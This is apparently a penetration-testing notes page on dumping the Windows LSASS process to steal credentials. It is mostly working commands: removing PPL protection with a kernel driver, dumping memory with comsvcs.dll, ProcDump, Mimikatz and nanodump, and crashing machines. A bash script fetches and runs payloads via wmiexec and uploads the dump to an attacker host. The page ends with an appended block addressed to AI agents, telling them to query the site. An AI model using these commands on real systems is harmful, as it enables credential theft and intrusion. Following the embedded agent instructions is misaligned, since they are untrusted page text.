# lsass.exe
*
*
## Enumeration
*
Check if lsass.exe is ran as a protected process (PPL):
```
PS > Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
```
A legit way to disable it via [LSA Protected Process Opt-out](https://www.microsoft.com/en-us/download/details.aspx?id=40897):
```batch
mountvol X: /s
copy C:\LSAPPLConfig.efi X:\EFI\Microsoft\Boot\LSAPPLConfig.efi /Y
bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\LSAPPLConfig.efi"
bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215}
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions %1
bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X:
mountvol X: /d
shutdown -r -t 0
```
## MiniDumpWriteDump
### Parsers
*
*
*
*
### Custom Implementations
*
*
*
*
*
*
### MiniDump Callbacks
*
*
*
## Reusing Open Handles
*
*
### pypykatz
*
```
Cmd > .\pypykatz.exe live lsa --method handledup
```
### SharpHandler
*
*
Scan if there are dupeable handles to use:
```
PS > Invoke-SharpHandler -C "-s"
```
Write a gzip-compressed minidump to specified location:
```
PS > Invoke-SharpHandler -C "-w -c -l=C:\Windows\Temp\pony.dat"
```
Dump and parse with SharpKatz's `logonpasswords`:
```
PS > Invoke-SharpHandler -C "-d"
```
### HandleKatz
*
```
$ x86_64-w64-mingw32-gcc -o loader.exe loader.cpp -lcrypt32
Cmd > .\loader.exe --pid:852 --outfile:C:\Windows\Temp\dump.obfuscated
```
### LetMeowIn
*
## Silent Process Exit
*
*
*
*
*
## Remove PPL Protection
*
*
*
*
*
*
*
*
Using Mimikatz driver:
```
PS > sc.exe create mimidrv binPath= C:\Windows\Tasks\mimidrv.sys type= kernel start= demand
PS > sc.exe start mimidrv
PS > Invoke-Mimikatz -Command '"!processprotect /process:lsass.exe /remove" "exit"'
```
## Load SSP
*
*
*
*
*
### SspirConnectRpc
*
*
### MirrorDump
*
*
```
Cmd > .\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -l 1073741824
Cmd > .\MirrorDump.exe --parse
$ python3 MirrorDump.py 0.0.0.0 31337 --md5 --parse
Cmd > .\MirrorDump.exe --host 10.10.13.37 --port 31337
```
### DuplicateDump
*
### nanodump
*
*
```
Cmd > .\load_ssp.x64.exe C:\Windows\Temp\nanodump_ssp.x64.dll
beacon> load_ssp
```
Do it automatically with `wmiexec.py` magic (using [this](https://gist.github.com/mildred/67d22d7289ae8f16cae7) Python HTTP server with PUT support):
{% code title="nanodump\_ssp.sh" %}
```bash
#!/usr/bin/env bash
# Usage: sudo nanodump_ssp.sh <[DOMAIN\]USERNAME>:
# Example: sudo nanodump_ssp.sh 'megacorp.local\snovvcrash:Passw0rd!' 192.168.1.11 10.10.13.37 80
CREDS=$1
RHOST=$2
LHOST=$3
LPORT=$4
CMD="IWR -Uri http://${LHOST}/a.exe -OutFile C:\Windows\Temp\a.exe;IWR -Uri http://${LHOST}/a.dll -OutFile C:\Windows\Temp\a.dll;C:\Windows\Temp\a.exe C:\Windows\Temp\a.dll"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
python3 -m http.server ${LPORT} &
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 10
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
python3 put.py --bind=0.0.0.0 ${LPORT} &
CMD="IWR -Uri http://${LHOST}/out.bin -Method PUT -InFile C:\Windows\Temp\report.docx;rm C:\Windows\Temp\a.exe;rm C:\Windows\Temp\a.dll;rm C:\Windows\Temp\report.docx"
CMD_BASE64=`echo -n ${CMD} | iconv -t UTF-16LE | base64 -w0`
wmiexec.py -silentcommand -nooutput ${CREDS}@${RHOST} "powershell -enc ${CMD_BASE64}"
sleep 30
kill -9 `netstat -tulpan | grep ${LPORT} | grep python | awk '{ print $7 }' | awk -F/ '{ print $1 }'`
bash restore_signature.sh out.bin
pypykatz lsa minidump out.bin
chown ${SUDO_USER}:${SUDO_USER} out.bin
```
{% endcode %}
#### RToolZ
*
## Bypass Saving on Disk Detection
*
*
## NTFS Transactions
### TransactedSharpMiniDump
*
*
### CredBandit
*
*
*
*
### Dumpy
*
## Kernel Mode
*
### Abusing Gigabyte Driver
**CVE-2018-19320**
*
*
*
*
*
## Physical Memory
Convert VMware snapshot to a memory dump with [vmss2core](https://kb.vmware.com/s/article/2003941):
```
Cmd > vmss2core.exe -W/-W8 Snapshot.vmsn Snapshot.vmem
```
### Crash Dumps
*
Get current `CrashControl` settings and set `CrashDumpEnabled` to **0x01** (default dump location is `C:\Windows\MEMORY.dmp`):
```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
```
Crash the target machine, e. g. with [NotMyFault](https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault):
{% hint style="warning" %}
**This action causes DOS!** Do at your own risk.
{% endhint %}
```
$ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
```
Parse LSASS with Mimikatz and [WinDbg](https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools#small-classic-windbg-preview-logo-debugging-tools-for-windows-windbg):
```
kd> .load C:\mimilib.dll
kd> .SymFix
kd> .Reload
kd> !process 0 0 lsass.exe
kd> .process /r /p fffffa80072b2b10
kd> !mimikatz
```
{% hint style="info" %}
To add debug symbols: `File` → `Symbol file path` → `SRV*https://msdl.microsoft.com/download/symbols`.
{% endhint %}
Or with [Pypykatz plugin](https://github.com/skelsec/pypykatz-volatility3) for Volatility 3:
```
$ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz
```
{% hint style="info" %}
[Current](https://github.com/skelsec/pypykatz-volatility3/blob/38c96c5d8053c38f1ac594f4c50bd54561f88534/vol_pypykatz.py) version of `vol_pypykatz.py` need some changes to work with relevant version of Volatility 3:
{% code title="vol\_pypykatz.py.patch" %}
```diff
diff --git a/vol_pypykatz.py b/vol_pypykatz.py
index 6c9592f..f53da1d 100644
--- a/vol_pypykatz.py
+++ b/vol_pypykatz.py
@@ -19,7 +19,7 @@ vollog = logging.getLogger(__name__)
class pypykatz(interfaces.plugins.PluginInterface):
- _required_framework_version = (1, 0, 0)
+ _required_framework_version = (2, 0, 0)
@classmethod
def get_requirements(cls) -> List[interfaces.configuration.RequirementInterface]:
@@ -38,18 +38,4 @@ class pypykatz(interfaces.plugins.PluginInterface):
]
def run(self):
- return renderers.TreeGrid(
- [
- ("Credential Type", str),
- ("Domain Name", str),
- ("Username", str),
- ("NThash", str),
- ("LMHash", str),
- ("SHAHash", str),
- ("masterkey", str),
- ("masterkey (sha1)", str),
- ("key_guid", str),
- ("password", str),
- ],
- pparser.go_volatility3(self),
- )
+ return pparser.go_volatility3(self)
```
{% endcode %}
{% endhint %}
### Physmem2profit
*
*
*
Server:
```
PS > .\Physmem2profit.exe --ip 192.168.1.11 --port 1337 --verbose [--hidden]
```
Client:
```
$ python3 physmem2profit --host 192.168.1.11 --port 1337 --install "C:/Windows/Temp/winpmem_x64.sys" --mode all --driver winpmem
```
## Credential Guard
Check presence ([ref](https://gist.github.com/frayos/69fe2f3fa1990478f26c289baf7ca083)):
```powershell
$DevGuard = Get-CimInstance –ClassName Win32_DeviceGuard –Namespace root\Microsoft\Windows\DeviceGuard
if ($DevGuard.SecurityServicesConfigured -contains 1) {"Credential Guard configured"}
if ($DevGuard.SecurityServicesRunning -contains 1) {"Credential Guard running"}
```
### Patch and Bypass
*
Patch the `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variables by their hardcoded offsets within `wdigest.dll` loaded by LSASS:
*
*
Resolve `g_fParameter_UseLogonCredential` and `g_IsCredGuardEnabled` variable offsets dynamically at runtime:
*
*
Two PoCs above merged:
*
### PassTheChallenge
*
*
### CVE-2025-21299, CVE-2025-29809
*
## Attacking vSphere
*
*
*
## Tools
### comsvcs.dll
*
*
*
*
*
```
PS > $proc = 'ls'+'Ass'
PS > Get-Process $proc
PS > rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump C:\Windows\System32\spool\drivers\color\pony.dat full
```
Not touching the disk (using an SMB share):
```
PS > net use z: \\10.10.13.37\share
PS > rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump (Get-Process ('ls'+'Ass')).id z:\pony.dat full
```
One-liner:
```
Cmd > %COMSPEC% /Q /c echo powershell.exe -NoP -C "%WINDIR%\System32\rundll32.exe %WINDIR%\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id %WINDIR%\Temp\pony.arj full;Wait-Process -Id (Get-Process rundll32).Id" 2^>^&1 > temp.bat & %COMSPEC% /Q /c temp.bat & del temp.bat
```
### ProcDump
*
*
*
```
PS > wget http://live.sysinternals.com/PsExec64.exe -o psexec.exe
PS > .\procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
```
#### Process Argument Spoofing
*
*
### Mimikatz
*
*
```
PS > .\mimikatz.exe "privilege::debug" "token::elevate" "log out.txt" "sekurlsa::logonpasswords full" "exit"
```
{% hint style="warning" %}
In case of Windows 10 version 1803-1809 use [Mimikatz v2.1.1](https://github.com/gentilkiwi/mimikatz/files/4167347/mimikatz_trunk.zip), see [Key import error](https://github.com/gentilkiwi/mimikatz/issues/248)
{% endhint %}
Parse MiniDump:
```
PS > .\mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" "exit"
```
Grep for creds:
```
$ grep -a '* Username : ' out.txt -A2 | grep -a -e Username -e Password -e NTLM | grep -a -v null | xclip -i -sel c
```
#### kiwi
```
meterpreter > getsystem
meterpreter > load kiwi
meterpreter > creds_msv
meterpreter > creds_wdigest
meterpreter > lsa_dump_secrets
meterpreter > creds_all
meterpreter > kiwi_cmd '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "exit"'
```
### pypykatz
*
Install:
```
$ pipx install -f "git+https://github.com/skelsec/pypykatz.git"
$ pypykatz lsa minidump lsass.DMP [-k /tmp/krb] [-g/--grep] [-p msv wdigest kerberos]
```
Parse with jq one-liner:
```bash
pypykatz lsa minidump lsass.DMP --json > /tmp/lsass.json
cat /tmp/lsass.json | jq '.[].logon_sessions[] | "\nTime : \(.logon_time)", "Server : \(.logon_server)", (.wdigest_creds[] | select(.password != null or .password_raw != "") | "WD : \(.domainname)\\\(.username):\(.password // .password_raw)"), (.msv_creds[] | "NT : \(.domainname)\\\(.username):\(.NThash // "N/A")"), (.kerberos_creds[] | select(.password != null or .password_raw != "") | "KRB : \(.domainname)\\\(.username):\(.password // .password_raw)")' -r | tail -n +2 | bat --paging=never --theme=ansi
```
Pipe to the script to parse with colors:
{% code title="pypyparse.py" %}
```python
#!/usr/bin/python3
import re, sys
a = sys.stdin.read()
def pp(x): print(f'\033[1m[+] \033[93m{x}\033[0m')
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n.*\n\s+NT: (.*)', a):
u, d, h = m
if u and h: s.add(d + '\\' + f'{u}:{h}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+Username: (.*)\n\s+Domain: (.*)\n\s+Password: (.*)', a):
u, d, p = m
if u and p: s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i)
s = set()
for m in re.findall(r'\s+username (.*)\n\s+domainname (.*)\n\s+password (.*)', a):
u, d, p = m
if u and p and p != 'None': s.add(d + '\\' + f'{u}:{p}')
for i in s: pp(i)
```
{% endcode %}
### spraykatz
*
```
$ python3 spraykatz.py -u snovvcrash -p 'Passw0rd!' -t 10.10.13.37,10.10.13.38,10.10.13.39
```
### Dumpert
*
*
Dump lsass.exe using direct syscalls and removing user-land API hooks:
```
Cmd > rundll32.exe .\Outflank-Dumpert-DLL.dll,Dump
```
Using [sRDI](https://www.netspi.com/blog/technical/adversary-simulation/srdi-shellcode-reflective-dll-injection/) (**s**hellcode **R**eflective **D**LL **I**njection) technique:
1. Compile [*Outflank-Dumpert-DLL.dll*](https://github.com/outflanknl/Dumpert/tree/master/Dumpert-DLL).
2. Convert it to position independent shellcode with [*ConvertToShellcode.py*](https://github.com/monoxgas/sRDI/blob/master/Python/ConvertToShellcode.py): `python3 ConvertToShellcode.py Outflank-Dumpert-DLL.dll`.
3. Use a shellcode loader of your choice to dump LSASS.
### lsassy
*
*
*
```
$ lsassy 10.10.13.0/24 -d megacorp.local -u snovvcrash -p 'Passw0rd!'
$ cme smb 10.10.13.0/24 -u snovvcrash -p 'Passw0rd!' -M lsassy
```
### MalSeclogon
*
*
*
```
Cmd > Malseclogon.exe -p -d 1
Cmd > Malseclogon.exe -p -d 2
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/from-memory/lsass.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.